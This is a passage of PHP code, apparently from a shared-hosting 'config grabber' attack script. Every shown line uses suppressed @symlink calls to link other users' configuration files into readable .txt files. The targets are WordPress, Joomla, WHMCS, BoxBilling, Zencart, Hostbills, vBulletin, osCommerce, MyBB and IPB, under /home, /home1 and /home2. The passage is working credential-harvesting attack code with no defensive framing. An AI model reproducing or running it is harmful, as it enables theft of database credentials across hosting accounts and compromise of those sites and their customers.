  1322. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1358. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1383. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1384. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1385. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1386. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1387. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1388. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1389. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1390. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1391. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1392. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1393. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1394. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1395. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1396. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1397. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1398. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1399. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1400. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1401. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1402. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1403. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1404. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1405. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1406. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1407. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1408. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1409. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1410. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1411. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1412. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1413. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1414. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1415. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1416. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1417. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1418. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1419. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1420. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1421. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1422. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1423. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1424. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1425. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1426. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1427. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1428. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1429. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1430. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1431. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1432. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1433. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1434.  
  1435. //Home1
  1436.  
  1437. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1438. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1439. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1440. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1441. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1442. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1443. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1444. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1445. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1446. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1447. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1448. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1449. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1450. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1451. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1452. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1453. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1454. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1455. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1456. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1457. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1458. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1459. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1460. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1461. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1462. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1463. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1464. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1465. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1466. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1467. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1468. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1469. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1470. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1471. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1472. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1473. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1474. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1475. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1476. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1477. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1478. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1479. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1480. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1481. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1482. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1483. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1484. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1485. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1486. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1576. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1577. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1578. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1579. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1580. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1581. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1582. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1583. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1584. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1585. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1586. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1587. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1588. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1589. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1590. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1591. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1592. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1593. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1594. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1595. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1596. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1597. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1598. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1599. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1600. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1601. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1602. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1603. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1604. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1605. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1606. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1607. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1608. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1609. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1610. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1611. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1612. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1613. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1614. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1615. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1616. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1617.  
  1618. //Home2
  1619.  
  1620. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1621. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1622. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1623. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1624. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1625. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1626. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1627. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1628. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1629. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1630. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
